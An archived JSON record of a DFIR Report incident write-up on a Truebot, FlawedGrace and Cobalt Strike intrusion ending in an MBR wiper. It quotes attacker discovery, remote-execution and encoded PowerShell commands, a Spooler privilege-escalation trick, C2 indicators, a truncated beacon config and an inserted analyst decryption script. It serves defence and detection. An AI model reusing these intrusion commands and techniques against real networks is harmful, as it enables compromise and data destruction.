{
	"id": "3d3eec60-08ec-4bb4-9fcb-6216773fcdbb",
	"created_at": "2026-04-06T00:08:50.535112Z",
	"updated_at": "2026-04-10T13:11:34.14273Z",
	"deleted_at": null,
	"sha1_hash": "64df87cac686a9d3f82ec3e06e6364718b9afeb1",
	"title": "A Truly Graceful Wipe Out - The DFIR Report",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5740285,
	"plain_text": "A Truly Graceful Wipe Out - The DFIR Report\r\nBy editor\r\nPublished: 2023-06-12 · Archived: 2026-04-05 13:18:39 UTC\r\nIn this intrusion, dated May 2023, we observed Truebot being used to deploy Cobalt Strike and FlawedGrace (aka\r\nGraceWire \u0026 BARBWIRE) resulting in the exfiltration of data and the deployment of the MBR Killer wiper. The threat\r\nactors deployed the wiper within 29 hours of initial access.\r\nServices\r\nPrivate Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published\r\npost-intrusion.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking,\r\ndata clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences using real data from real intrusions. Interactive labs\r\nare available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.\r\nContact us today for a demo!\r\nCase Summary\r\nIn this case, Truebot was delivered through a Traffic Distribution System (TDS) reported by Proofpoint as “404 TDS”. This\r\ncampaign, observed in May 2023, leveraged email for the initial delivery mechanism. After clicking through the link in an\r\nemail, the victim would be redirected through a series of URLs before being presented with a file download at the final landing\r\npage.\r\nThe file download was a Truebot executable, which appeared as a fake Adobe Acrobat document. After executing the file,\r\nTruebot copied and renamed itself. Minutes later, Truebot loaded FlawedGrace onto the host. 
While loading this malware, it\r\nused a series of modifications to the registry and Print Spooler service to both escalate privileges and establish persistence.\r\nFrom there, FlawedGrace’s execution routine involved storing and extracting encoded and encrypted payloads in the\r\nregistry, the creation of temporary scheduled tasks and the injection of the final payload into msiexec.exe and svchost.exe.\r\nAfter this execution, the threat actors proceeded to disable Windows Defender Real-Time monitoring and added exclusions\r\nfor executable files on the host. We later observed FlawedGrace creating a temporary user within the local Administrators\r\nand Remote Desktop Users groups. With this user, a tunneled RDP connection was attempted from FlawedGrace’s C2\r\nservers. Seemingly without success, the threat actors removed the user after 15 minutes before repeating the procedure a\r\nsecond time. After the second failed attempt, the threat actors removed the user and did not attempt further RDP\r\ncommunications. The FlawedGrace process then performed discovery surrounding the domain administrators and domain\r\ncontrollers.\r\nApproximately two hours after the initial execution, Truebot loaded Cobalt Strike into memory and then went dormant for\r\nthe next two hours. This ended the use of Truebot for the rest of the intrusion; FlawedGrace and Cobalt Strike were\r\nleveraged for the rest of the threat actors’ activity. Now, four hours into the intrusion, the threat actors, through the Cobalt\r\nStrike beacon, started another round of discovery commands using net, nltest, tasklist and AdFind.exe.\r\nhttps://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/\r\nPage 1 of 36\n\nAfter having accessed LSASS memory on the beachhead host, the threat actors leveraged a local administrator hash to\r\nperform pass-the-hash lateral movement through the environment. The threat actors used Impacket’s atexec to execute\r\ndiscovery commands on remote hosts. 
These discovery commands included the PowerShell cmdlet Get-MpComputerStatus\r\nand quser. After these discovery commands, the threat actors used Cobalt Strike’s jump psexec module to further move\r\nbetween hosts. Following each lateral movement action, Cobalt Strike loaded FlawedGrace in memory on all hosts accessed\r\nby the adversary.\r\nAround five hours post initial access, the threat actors went silent. FlawedGrace and Cobalt Strike went dormant on all hosts\r\nexcept the beachhead system. Seventeen hours later, the threat actors returned to the network and issued enumeration\r\ncommands to discover network shares. Around that time, we observed signs of data exfiltration from the environment.\r\nRoughly four hours after the exfiltration began, merely 29 hours into the intrusion, the threat actors deployed the MBR\r\nKiller wiper on all hosts where FlawedGrace had been running, including a file server. This executable overwrote the MBR\r\n(Master Boot Record) and triggered a reboot, rendering the hosts unusable. Numerous systems were left at the boot screen,\r\ninoperable.\r\nFollowing these actions, the threat actors lost all footholds in the network. While data was exfiltrated, no responsibility\r\nhas been claimed and no extortion notes were found.\r\nAttribution\r\nTruebot (a.k.a. Silence.Downloader) has been attributed to the Silence group, which has had long-standing interactions with\r\nthe financially motivated criminal group TA505 (spammer/distribution). The FlawedGrace malware has been reportedly\r\nassociated with, but is not exclusive to, TA505, and has commonly been distributed by Truebot.\r\nMost recently, an activity group reported by Microsoft as Lace Tempest was observed running a Cl0p extortion operation.\r\nAccording to Microsoft, “Lace Tempest (DEV-0950) is a Clop ransomware affiliate that has been observed using\r\nGoAnywhere exploits and Raspberry Robin infection hand-offs in past ransomware campaigns.”\r\n“Lace Tempest operates in two modes. 
One mode where they deploy Cl0p enterprise wide and the other where\r\nthey do mass exploitation against file transfer servers – and steal data (and possibly deploy mbrkiller). Both sets\r\nof victims show up on Cl0p leak site. Even if the ransom payload wasn’t deployed.”\r\n– Christopher Glyer, Principal Security Researcher with Microsoft Threat Intelligence\r\nThe MBR Killer binary in this case was attributed to the Lace Tempest activity group per Microsoft. Microsoft also recently\r\nattributed the MOVEit Transfer 0-day (CVE-2023-34362) exploitation to Lace Tempest.\r\nAccording to Mandiant, in January 2023 FIN11 was observed deploying TRUECORE (a version of Truebot) and\r\nBARBWIRE (FlawedGrace) after exploiting a SolarWinds Serv-U server (CVE-2021-35211). During this time,\r\nBARBWIRE C2 was communicating with 5.188.86[.]18:443, which we observed in this case. In April, Mandiant again\r\nobserved BARBWIRE C2 communicating to 5.188.86[.]18:443 as well as 92.118.36[.]199:443, which was also observed\r\nduring this case. During this time period, Mandiant also noted that shellcode payloads were staged on a TRUECORE C2\r\nserver, which pointed to 5.188.206[.]78, the Cobalt Strike server in this case. Mandiant also confirmed that they’ve observed\r\nFIN11 using MBR Killer as early as 2019. According to Mandiant, FIN11 has used BARBWIRE since at least 2018, and\r\nthey believe that the backdoor is exclusive to the threat group. Mandiant also recently attributed the MOVEit Transfer 0-day\r\n(CVE-2023-34362) exploitation to FIN11.\r\nDue to the overlap of TTPs, we are attributing this intrusion with high confidence to Lace Tempest and FIN11 with possible\r\nTA505 overlaps.\r\nAnalysts\r\nAnalysis and reporting by @Kostastsale, @svch0st and @0xThiebaut.\r\nInitial Access\r\nAs is the case for many intrusions, initial access was obtained through an email campaign. 
Reports by Proofpoint point to\r\nthis campaign using the 404 Traffic Distribution System (TDS) service. The following Proofpoint screenshots highlight how\r\n“404 TDS” is leveraged to turn email campaigns into drive-by downloads.\r\nDuring this intrusion, the TDS redirection was reported by Proofpoint as follows:\r\n1. hxxps[:]//hrcbishtek[.]com/{5 alphanumeric characters}\r\n2. hxxps[:]//imsagentes[.]pe/dgrjfj\r\n3. hxxps[:]//imsagentes[.]pe/dgrjfj/\r\n4. hxxps[:]//ecorfan[.]org/base/sj/Document_may_24_16654.exe\r\nThe resulting hxxps[://]ecorfan[.]org/base/sj/Document_may_24_16654[.]exe URL performed a drive-by download,\r\ndelivering the initial Truebot payload Document_may_24_16654.exe.\r\nThe deceptive Document_may_24_16654.exe name entices users into opening what they believe\r\nis a recent document.\r\nExecution\r\nTruebot was used to load both Cobalt Strike and FlawedGrace on the initial host.\r\nTruebot\r\nThe payload, Document_may_24_16654.exe, imitated a PDF document by using an icon of an Adobe Acrobat document.\r\nThis was further reinforced when the malware displayed the following message claiming Adobe Acrobat failed to\r\nopen the file (even if Acrobat was not installed on the target system).\r\nTruebot’s first action was to create an exact copy of itself in the following path and then execute it.\r\nC:\\Intel\\RuntimeBroker.exe\r\nThe newly created copy reached out to the Truebot C2 of essadonio[.]com (45.182.189[.]71).\r\nCobalt Strike\r\nTruebot spawned an instance of C:\\Windows\\system32\\cmd.exe, which was followed up by a remote thread created in the\r\nnew process. 
The memory of cmd.exe clearly indicated signs of injection, as seen below, where a section of memory was set\r\nto execute-read-write (PAGE_EXECUTE_READWRITE) and contained the telltale MZ (0x4d5a) header of a PE binary.\r\nFurther investigation identified the injected module beacon.dll at the same offset as above (0x164a2fb0000) in the loaded\r\nmodules of the target process.\r\nbeacon.dll is the default name Cobalt Strike gives to generated payloads, and it stands out further because the DLL did not\r\nhave a path on disk.\r\nThis Cobalt Strike beacon was used both to query information and to move around the network, which will be discussed in later\r\nsections.\r\nDuring the intrusion, the process running the beacon spawned the following process command line:\r\nping -n 1 \u003cREDACTED\u003eshell wmic /node:\u003cREDACTED\u003e process get executablepath\r\nAs we have observed in previous cases, threat actors make mistakes too! In this case, shell is a Beacon\r\ncommand used to spawn a new process. Here it is mashed between two commands, indicating human error.\r\nFlawedGrace\r\nTruebot loaded another, more complex payload alongside Cobalt Strike: the Remote Access Trojan (RAT)\r\n“FlawedGrace.” The initial execution chain of this malware was observed across multiple endpoints when they were first\r\ninfected.\r\nThe first observed behavior of this chain was to create a new instance of spoolsv.exe that was shortly afterwards accessed by the\r\nTruebot process (RuntimeBroker.exe). This process would then spawn instances of msiexec.exe, which would reach out to\r\nthe initial FlawedGrace C2 of 92.118.36[.]199.\r\nInstead of creating a task through schtasks.exe, FlawedGrace used three different methods to create new scheduled tasks.\r\nThe first was to import the taskschd.dll library into the main host process to create a new task called 2. 
The task was\r\nremoved as soon as the new command gained SYSTEM-level privileges.\r\nThe second was observed within obfuscated PowerShell, where the Schedule.Service COM Object was used to create a new\r\ntask.\r\nThe last method was to use native PowerShell cmdlets to register a task.\r\nThe initial task \\2 ran the following command, which was scheduled for the minute after its creation:\r\npowershell -c \"\u0026{(-join('246A3D277B38443831363736432D374636332D384638312D363736452D3636364236433637383138447D2\r\nThe first part of the command decodes the hex-encoded string (each pair of hex digits is one ASCII character), resulting in the following PowerShell code:\r\n$j='{8D81676C-7F63-8F81-676E-666B6C67818D}';([Text.Encoding]::UTF8.GetString((gp ('hklm:\\\\software\\\\2\\\\clsid\\\\\r\nThe decoded code sets the variable $j to the value {8D81676C-7F63-8F81-676E-666B6C67818D}. It then reads a value\r\nfrom the Windows Registry under the SOFTWARE\\2\\CLSID\\{8D81676C-7F63-8F81-676E-666B6C67818D}\\Type key,\r\nconverts the value to a UTF-8 string, and executes it.\r\nBased on script block logging, the PowerShell script contained in the registry would manipulate and populate further\r\nregistry keys in the HKLM:\\Software\\Classes\\CLSID\\ key using HKLM:\\Software\\2\\CLSID as a staging location. The\r\nmalware created specific key names attempting to blend in with the other COM objects that are legitimately kept within this\r\nlocation. 
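The task action quoted above hides its first stage as a hex string, and the TypeLib stage described below decrypts an RC4-encrypted DLL with a key the report only describes as hostname-based. The Python below is an added analyst example written for this write-up; it is not code from the report, from Impacket, or from the malware. It decodes the truncated hex string exactly as quoted above (returning the dangling nibble rather than failing) and round-trips a constructed payload through RC4 and a minimal PE-header sanity check. Because the report does not give the key derivation, the example assumes the hostname itself is the RC4 key; the hostname WS-FINANCE-01 and the encrypted sample blob are made up for the demonstration.

```python
import re

# Hex string quoted in the report from the action of the scheduled task named 2.
# The report's copy is truncated, so it ends on an unpaired nibble.
TASK_HEX = ('246A3D277B38443831363736432D374636332D384638312D363736452D'
            '3636364236433637383138447D2')

PE_SIGNATURE = b'PE' + bytes(2)   # the letters PE followed by two NUL bytes


def decode_hex_stage(blob):
    '''Decode the hex-encoded PowerShell stage FlawedGrace placed in a task action.

    Returns (decoded_text, leftover). Characters that are not hex digits (quotes,
    whitespace) are dropped first; a trailing unpaired nibble, as in a truncated
    capture, is returned as leftover instead of raising.
    '''
    digits = re.sub('[^0-9A-Fa-f]', '', blob)
    cut = len(digits) - (len(digits) % 2)
    return bytes.fromhex(digits[:cut]).decode('latin-1'), digits[cut:]


def rc4(key, data):
    '''Plain RC4 (key scheduling plus keystream); encrypt and decrypt are the same call.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_registry_payload(blob, computername):
    '''Recover a DLL staged in the registry the way the TypeLib stage does.

    ASSUMPTION: the report only says the key is based on the hostname; this
    example uses the hostname itself (UTF-8) as the RC4 key.
    '''
    return rc4(computername.encode(), blob)


def looks_like_pe(data):
    '''True if data starts with MZ and carries a PE signature at e_lfanew.'''
    if len(data) < 0x40 or data[:2] != b'MZ':
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], 'little')
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


# Constructed sample: a minimal MZ/PE header stub encrypted under a made-up hostname.
SAMPLE_HOST = 'WS-FINANCE-01'
_stub = bytearray(0x44)
_stub[0:2] = b'MZ'
_stub[0x3C:0x40] = (0x40).to_bytes(4, 'little')
_stub[0x40:0x44] = PE_SIGNATURE
SAMPLE_ENCRYPTED = rc4(SAMPLE_HOST.encode(), bytes(_stub))

if __name__ == '__main__':
    text, leftover = decode_hex_stage(TASK_HEX)
    print(text, '| unpaired nibble:', leftover or '(none)')
    recovered = decrypt_registry_payload(SAMPLE_ENCRYPTED, SAMPLE_HOST)
    print('valid PE after decryption:', looks_like_pe(recovered))
```

When working a real case, feed decrypt_registry_payload the bytes read from the ProgID value and the COMPUTERNAME of the host the value was collected from; if looks_like_pe fails, the key derivation differs from the assumption above and the PowerShell in TypeLib has to be read to recover it.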
The malware would create additional scheduled tasks using one of the following names selected randomly:\r\n\\Microsoft\\Windows\\System diagnostics service\r\n\\Microsoft\\Windows\\System diagnostics monitor\r\n\\Microsoft\\Windows\\System monitor\r\n\\Microsoft\\Windows\\System service\r\nThe final loaded PowerShell script was stored here:\r\nHKLM\\Software\\Classes\\CLSID\\{8D81676C-7F63-8F81-676E-666B6C67818D}\\TypeLib\r\nThe PowerShell code in TypeLib would decrypt the RC4 encrypted payload stored in ProgID using a key based on the\r\nhostname ($env:COMPUTERNAME) of the target host and then inject the DLL into the FlawedGrace msiexec.exe and\r\nsvchost.exe processes.\r\nThe encrypted DLL stored in Registry\r\nWe manually reversed the RC4 routine to decrypt the DLL; its hash matched the FlawedGrace module found in the processes’\r\nmemory (c.dll).\r\nThe PE details of the injected module c.dll were those of a DLL with the original name icuin.dll, claiming to be part of the\r\nInternational Components for Unicode libraries, as seen below:\r\nWhen FlawedGrace attempted to run certain commands on the target host, it displayed the specific behavior of spawning an\r\ninstance of cmd.exe as a sacrificial intermediate process.\r\nShortly after these instances of cmd.exe were spawned, they would be accessed by the FlawedGrace process svchost.exe.\r\nOf note, the arguments in these processes’ command lines used flags that do not exist (/I, /SI, /O, /SO):\r\nA Sigma rule to detect this activity can be found at the end of the report.\r\nPersistence\r\nThreat actors established persistence on all infected hosts they pivoted to in the network. The scheduled tasks were\r\nconfigured to load FlawedGrace using PowerShell. 
While the tasks created initially to run FlawedGrace were registered with\r\nthe task name \\2, tasks created for persistence used a naming convention mimicking various system tasks and were placed\r\nunder the \\Microsoft\\Windows\\ task path.\r\n\\Microsoft\\Windows\\System diagnostics monitor\r\n\\Microsoft\\Windows\\System monitor\r\n\\Microsoft\\Windows\\System service\r\nThese tasks used a BootTrigger so that the malware restarted at boot.\r\nPlease refer to the “FlawedGrace” portion of the Execution section for details on the different execution methods threat\r\nactors used to register these scheduled tasks.\r\nOn the beachhead host, the threat actors added a user account named adminr. This account was then added to the local\r\nAdministrators group and Remote Desktop Users group. The account was observed being used to test RDP tunneling in the\r\nenvironment. This account was added and removed several times, but after the first three hours of access, it was deleted and\r\nnot re-added by the threat actors.\r\nPrivilege Escalation\r\nWe believe that to elevate their privileges, the threat actor might have abused an odd default Windows behavior surrounding\r\nchanges to a service’s required privileges:\r\nThe change in required [service] privileges takes effect the next time the service is started. […] If you do not set\r\nthe required privileges, the SCM uses all the privileges assigned by default to the process token. 
– Source\r\nTo abuse this SCM behavior, the threat actors were seen stopping the Spooler service before deleting the service’s\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Spooler\\RequiredPrivileges registry entry, restarting the\r\nservice and injecting into the newly created spoolsv.exe process.\r\nThe effect of deleting the RequiredPrivileges registry entry can be observed in the following screenshots, where the post-modification spoolsv.exe process is seen with a flurry of additional privileges, all of which the threat actors may enjoy\r\npost-injection. Because RequiredPrivileges is normally written once by the service installer and then left alone, deletions of\r\nvalues matching Services\\*\\RequiredPrivileges are worth alerting on.\r\nScheduled tasks were used by the threat actors to run much of their malware as SYSTEM. The initial FlawedGrace execution\r\ntask, registered as \\2, was created to run as SYSTEM, as shown by the Author field in the task details.\r\nThis was confirmed in process creation logs, where NT AUTHORITY\\SYSTEM ran the task’s command and arguments.\r\nDefense Evasion\r\nShortly after execution, Truebot copied itself to a new location under the name\r\nRuntimeBroker.exe, masquerading as the legitimate Windows executable responsible for managing certain application permissions.\r\nAs covered in the execution section, FlawedGrace uses a number of techniques to perform evasion, including encoding,\r\nencryption, and storing payloads in the registry. When executing, command-line data was encoded. See the Execution\r\nsection for a breakdown of the encoding.\r\nDuring runtime, the FlawedGrace malware decrypts the RC4 encrypted registry stored payload:\r\nWe observed process injection by all three malware families in this intrusion. 
First, Truebot used it to inject the Cobalt Strike\r\npayload into a cmd.exe process.\r\nReviewing memory dumps, the injected MZ header for the Cobalt Strike beacon is easily observable in the injected cmd.exe\r\nprocess.\r\nCobalt Strike was not the only injection with observable headers: the injected svchost.exe and msiexec.exe processes also contained telltale\r\ninjection signs like PAGE_EXECUTE_READWRITE protection and MZ file headers.\r\nStandard Cobalt Strike named pipes using the default postex_* pattern were observed throughout the intrusion.\r\n\\postex_0c2a\r\n\\postex_e3dc\r\n\\postex_7c32\r\n\\postex_8e03\r\n\\postex_f3cc\r\n\\postex_56b2\r\n\\postex_8c98\r\n\\postex_6ab5\r\n\\postex_7e1e\r\n\\postex_982c\r\n\\postex_a34b\r\n\\postex_7007\r\n\\postex_9e6a\r\n\\postex_ec79\r\n\\postex_5ef6\r\n\\postex_a195\r\n\\postex_10a9\r\n\\postex_511b\r\n\\postex_ffda\r\n\\postex_464b\r\n\\postex_dbf3\r\n\\postex_eb5d\r\n\\postex_1276\r\n\\postex_181d\r\n\\postex_8c48\r\nSome registry items were removed during the FlawedGrace PowerShell execution, specifically the items stored in\r\nHKLM:\\SOFTWARE\\2\\:\r\nThe threat actors also removed files: AdFind.exe was deleted after use, and Cobalt Strike beacons were removed\r\nafter being used for lateral movement.\r\nCredential Access\r\nApproximately one hour after the initial infection, we observed the threat actors using a remote dumping tool to extract\r\ncredentials via the registry hives. At this time, we cannot confidently name the tool that they used. The logs of the credential\r\naccess activity resemble those of secretsdump, which is a tool that is part of the Impacket library.\r\nWe noticed the creation of two temporary files in the C:\\Windows\\System32\\ directory. 
The names of these files consisted of\r\neight randomly generated characters. Prior to that, a service called “RemoteRegistry” was instructed to start. The Remote\r\nRegistry service allows administrators to access, modify, and manage the registry settings of other computers on a network. Once\r\nagain, an example of this approach can be seen through secretsdump (secretsdump.py#L374).\r\nWe believe that the threat actors utilized an older version of the Impacket library. As of May 4th, 2023,\r\nversion 0.10.0 changed the location to which the registry hives are saved; they are now written as temp files under the\r\nC:\\Windows\\Temp directory. In this case, however, we observed the temp files under C:\\Windows\\System32, which\r\nindicates the use of an older version of Impacket.\r\nAfter reviewing the Security event logs for event ID 4624 and the Sysmon event logs (event ID 1 \u0026 10) on the beachhead\r\nhost, we have determined that the attackers utilized Pass-The-Hash to run commands on remote hosts as the local\r\nadministrator user.\r\nSecurity Logs:\r\n4624 – LogonType: 9, LogonProcess: seclogo\r\nSysmon Logs:\r\n1 – Cobalt Strike Execution\r\n10 – Cobalt Strike Accessing LSASS Process\r\nWhen considering this evidence, the time sequence is a crucial factor. To prevent false positives, defenders can group related\r\nevents together based on their time of execution. However, we have also included specific Sigma rules that are capable of\r\nidentifying these execution patterns in isolation. Please refer to these rules in the Detections section of this report.\r\nDiscovery\r\nWe observed the threat actors using for loops to iterate through text files located in the C:\\ProgramData directory.\r\nThese files contained the hostnames of all workstations and servers within the network environment. 
The aim of this loop\r\nwas to execute discovery commands using ping to locate live endpoints and net view to enumerate their open shares. In\r\naddition, they used the dir command to test the feasibility of connecting to remote servers within the network through the\r\nlocal administrator’s account.\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers_live.txt) do net view \\\\%i /all \u003e\u003e C:\\Prog\r\nC:\\Windows\\system32\\cmd.exe /C for /f %%i in (C:\\ProgramData\\servers_live.txt) do dir \\\\%%i\\C$ \u003e\u003e C:\\ProgramDa\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\hosts.txt) do ping -n 1 %i -v 4 | find /I \"TTL\" \u003e\u003e\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers.txt) do ping -n 1 %i -v 4 | find /I \"TTL\"\r\nIn addition to using net view to find open shares, the attackers also examined the registry of the local host and saved a list of\r\nall mapped shares in a text file called 1.txt. We also observed them using the wmic command to execute the same action on a\r\nremote host.\r\ncmd /C \u003e C:\\ProgramData\\1.txt 2\u003e\u00261 reg query HKEY_USERS\\\\\u003cSID\u003e\\Network\r\nC:\\Windows\\system32\\cmd.exe /C wmic /node:\u003cREDACTED\u003e process call create \"cmd /C \u003e C:\\ProgramData\\1.txt 2\u003e\u00261 r\r\nThey later viewed and deleted the text file using the type and del commands respectively.\r\nTo check the status of the antimalware software that is installed, they used PowerShell along with the Get-MpComputerStatus cmdlet. This command was run on multiple hosts in the environment. 
We believe the execution of this\r\ncommand came through atexec.py, which is part of the Impacket collection: atexec redirects the command’s output to a file\r\nnamed with eight random letters under %windir%\\Temp, which matches the KMzFGwGn.tmp file seen here.\r\ncmd.exe /C powershell Get-MpComputerStatus \u003e C:\\Windows\\Temp\\KMzFGwGn.tmp 2\u003e\u00261\r\nAdFind was used in this intrusion; however, the threat actors limited the output to operating system information for computer\r\nobjects and specific attributes of the domain user objects.\r\nC:\\Windows\\system32\\cmd.exe /C AdFind.exe -f \"\u0026(objectcategory=computer)\" operatingSystem -csv \u003e 1.csv\r\nC:\\Windows\\system32\\cmd.exe /C AdFind.exe -f \"objectcategory=person\" sAMAccountName name displayName givenName\r\nWe also observed some other miscellaneous commands that we tend to see in every intrusion. These discovery commands\r\ncollected information about the administrator groups and users. One notable exception was the use of the tasklist command\r\nwith the /S parameter to retrieve the list of currently running processes from remote hosts.\r\nquser\r\nnet group \"Domain Admins\" /domain\r\nnet group \"Domain Controllers\" /domain\r\nnet group /domain\r\nnet localgroup \"Remote Desktop Users\"\r\nnet localgroup Administrators\r\nnet user \u003cuser\u003e /domain\r\nnltest /domain_trusts\r\ntasklist /S \u003cIP of remote host\u003e\r\nLateral Movement\r\nThe threat actors predominantly used Cobalt Strike’s jump psexec module to move to new hosts. The event ID 7045 (A new\r\nservice was installed in the system) in System.evtx showed clear evidence of the malicious service being installed.\r\nThe DFIR Report’s defender’s guide to Cobalt Strike discusses this in further detail.\r\nAs seen below, when filtered to these events, we observed the threat actor moving to a new system every 5-20 minutes.\r\nAs we mentioned in the discovery phase, threat actors also used atexec to execute commands on remote hosts. 
Impacket’s\r\natexec module allows the remote execution of commands on a Windows system by leveraging the Task Scheduler service.\r\nThe module registers a task on the remote system that executes the requested command; the task is then deleted\r\nonce it has run. The example below is from the Security event logs, event ID 4698.\r\nTo showcase the hardcoded lines of code responsible for the observed execution flow, we have included a snippet from\r\natexec’s official GitHub page in the screenshot above. Threat actors used Cobalt Strike to facilitate the execution of this\r\nmodule.\r\nIn some other cases, we saw threat actors executing the below command from the beachhead host toward a number of\r\nremote hosts.\r\ncmd.exe /C wmic /node:\u003cremote host\u003e process get executablepath\r\nThis command uses the Windows Management Instrumentation Command-line (WMIC) to remotely retrieve the executable\r\npaths of all running processes from a number of remote hosts.\r\n1. /node:\u003cremote host\u003e: specifies the remote host.\r\n2. process: the WMI class to be queried (the alias for Win32_Process), i.e. the running processes on the target system.\r\n3. get executablepath: retrieves the property ‘ExecutablePath’, which contains the complete path to the executable\r\nfor each running process.\r\nWe’ve created a chart displaying the times (UTC) when threat actors were active in the network. The data is based on a\r\nsample of affected hosts, but the pattern of activity remained consistent throughout the intrusion.\r\nCollection\r\nThroughout the intrusion, the attackers staged results from their discovery within either the temporary directory or\r\nC:\\ProgramData. 
As a reminder, the following discovery commands redirected their results to C:\\ProgramData\\hosts_live.txt\r\nand C:\\ProgramData\\servers_live.txt.\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\hosts.txt) do ping -n 1 %i -v 4 | find /I \"TTL\" \u003e\u003e\r\nC:\\Windows\\system32\\cmd.exe /C for /f %i in (C:\\ProgramData\\servers.txt) do ping -n 1 %i -v 4 | find /I \"TTL\"\r\nOther files populated with collected data included:\r\nC:\\ProgramData\\1.txt\r\nC:\\Windows\\Temp\\KMzFGwGn.tmp\r\nC:\\ProgramData\\1.csv\r\nC:\\ProgramData\\person.csv\r\nC:\\ProgramData\\servers_live_dir.txt\r\nThe extensive creation of text files (.txt and .csv) directly within the C:\\ProgramData directory provides detection and hunting\r\nopportunities, as legitimate software typically writes to sub-folders of this directory rather than to its root.\r\nCommand and Control\r\nTruebot\r\nCommunication to the Truebot C2 server at 45.182.189[.]71 began shortly after the execution of the initial access\r\nexecutable. 
This connection, however, only lasted for around two hours on the beachhead host, and activity ceased after the\r\nCobalt Strike beacon payload was loaded on the host.\r\nDomain IP Port JA3 JA3s\r\nessadonio[.]com 45.182.189[.]71 443 a0e9f5d64349fb13191bc781f81f42e1 f14f2862ee2df5d0f63a88b60c8eee\r\nessadonio[.]com 45.182.189[.]71 443 a0e9f5d64349fb13191bc781f81f42e1 f33734dfbbff29f68bcde052e523c2\r\nCertificate: [39:d7:cf:9d:0a:39:f6:b6:e4:cc:af:2e:34:9e:07:48:48:be:d1:ea]\r\nNot Before: 2023/05/18 00:00:00 UTC\r\nNot After: 2023/08/16 23:59:59 UTC\r\nIssuer Org: ZeroSSL\r\nSubject Common: essadonio.com [essadonio.com, www.essadonio.com]\r\nPublic Algorithm: id-ecPublicKey\r\nCurve: prime256v1\r\nJARM: 28d28d28d00028d00042d42d0000005a3e96c1dfa4bdb24b8b3c04cae18cc3\r\nLooking at memory collected from the beachhead host, we can observe the connection to the Truebot command and control\r\nserver made by RuntimeBroker.exe, the renamed executable copied from the initial malware payload.\r\nFlawedGrace\r\nThe FlawedGrace malware is unlike any command and control we’ve covered in previous reports, as it uses a custom binary\r\nprotocol rather than the more common application-layer protocols such as HTTP/S, RDP, or SSH.\r\nOver the course of the intrusion, the threat actors pivoted to several command and control addresses, with times of overlap\r\nbetween several C2 addresses. 
This activity took place several times over the course of the intrusion.\r\nAs well as pivoting between command and control servers, the threat actors started communication from various hosts over\r\nthe course of the intrusion, with no host maintaining constant beaconing.\r\nAs this malware uses a custom protocol, the usual indicators such as a TLS certificate or JA3 fingerprint were not present.\r\nIP Port\r\n81.19.135[.]30 443\r\n92.118.36[.]199 443\r\n5.188.86[.]18 443\r\nTraces of command and control activity were present in memory on several hosts, from the beachhead to multiple servers.\r\nOn most hosts the responsible process was no longer visible, but at least one host still had an active connection from an injected svchost.exe\r\nprocess to the FlawedGrace command and control server.\r\nDuring the first day of the intrusion, we observed a network signature hit for RDP tunneling from one of the FlawedGrace\r\ncommand and control servers, but due to no follow-up activity, it would appear that this did not function properly for the\r\nthreat actors.\r\nSignature Source IP\r\nET POLICY Tunneled RDP msts Handshake 92.118.36[.]199\r\nThis likely also explains the removal of the local user account that had been added to the Remote Desktop Users group.\r\nCobalt Strike\r\nCobalt Strike, unlike the other two malware families observed, remained in constant communication with its command and\r\ncontrol server from the time the first beacon was loaded until the end of the intrusion.\r\nWhile the Cobalt Strike command and control stayed active over the intrusion, the threat actors selectively deployed and\r\nremoved it on hosts, with only the beachhead host maintaining beaconing activity for the whole duration.\r\nIP Port JA3 JA3s\r\n5.188.206[.]78 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7\r\nCertificate: 
[6e:ce:5e:ce:41:92:68:3d:2d:84:e2:5b:0b:a7:e0:4f:9c:b7:eb:7c]\r\nNot Before: 2015/05/20 18:26:24 UTC\r\nNot After: 2025/05/17 18:26:24 UTC\r\nIssuer Org:\r\nSubject Common:\r\nSubject Org:\r\nPublic Algorithm: rsaEncryption\r\nThe empty issuer and subject fields, together with the 2015/05/20 to 2025/05/17 validity window, are those of the default self-signed certificate shipped with Cobalt Strike; this is what the ET HUNTING Empty SSL Certificate signature listed under Detections below matches on.\r\nCobalt Strike beacon configuration:\r\n{\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"sleeptime\": 60000,\r\n \"jitter\": 0,\r\n \"maxgetsize\": 16777216,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 1580103824,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"5.188.206.78\",\r\n \"port\": 443,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCpq+thntRoA67IEQOJ9T8JfpepBXCrOX43GMXPArNSegjOtHm8eQ79\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/ga.js\",\r\n \"verb\": \"GET\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": 